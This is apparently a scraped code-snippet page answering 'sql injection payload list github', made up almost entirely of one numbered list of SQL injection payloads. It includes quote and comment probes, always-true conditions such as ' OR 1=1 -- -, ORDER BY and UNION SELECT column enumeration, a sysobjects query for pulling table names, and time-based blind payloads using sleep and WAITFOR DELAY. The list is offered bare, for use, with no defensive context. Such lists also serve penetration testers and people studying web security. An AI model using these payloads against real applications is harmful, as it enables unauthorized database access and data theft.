sql injection payload list github

Solutions on MaxInterview for sql injection payload list github by the best coders in the world

showing results for - "sql injection payload list github"
Samuel
28 Feb 2019
1'
2''
3`
4``
5,
6"
7""
8/
9//
10\
11\\
12;
13' or "
14-- or # 
15' OR '1
16' OR 1 -- -
17" OR "" = "
18" OR 1 = 1 -- -
19' OR '' = '
20'='
21'LIKE'
22'=0--+
23 OR 1=1
24' OR 'x'='x
25' AND id IS NULL; --
26'''''''''''''UNION SELECT '2
27%00
28/*…*/ 
29+		addition, concatenate (or space in url)
30||		(double pipe) concatenate
31%		wildcard attribute indicator
32
33@variable	local variable
34@@variable	global variable
35
36
37# Numeric
38AND 1
39AND 0
40AND true
41AND false
421-false
431-true
441*56
45-2
46
47
481' ORDER BY 1--+
491' ORDER BY 2--+
501' ORDER BY 3--+
51
521' ORDER BY 1,2--+
531' ORDER BY 1,2,3--+
54
551' GROUP BY 1,2,--+
561' GROUP BY 1,2,3--+
57' GROUP BY columnnames having 1=1 --
58
59
60-1' UNION SELECT 1,2,3--+
61' UNION SELECT sum(columnname ) from tablename --
62
63
64-1 UNION SELECT 1 INTO @,@
65-1 UNION SELECT 1 INTO @,@,@
66
671 AND (SELECT * FROM Users) = 1	
68
69' AND MID(VERSION(),1,1) = '5';
70
71' and 1 in (select min(name) from sysobjects where xtype = 'U' and name > '.') --
72
73
74Finding the table name
75
76
77Time-Based:
78,(select * from (select(sleep(10)))a)
79%2c(select%20*%20from%20(select(sleep(10)))a)
80';WAITFOR DELAY '0:0:30'--
81
82Comments:
83
84#	    Hash comment
85/*  	C-style comment
86-- -	SQL comment
87;%00	Nullbyte
88`	    Backtick
89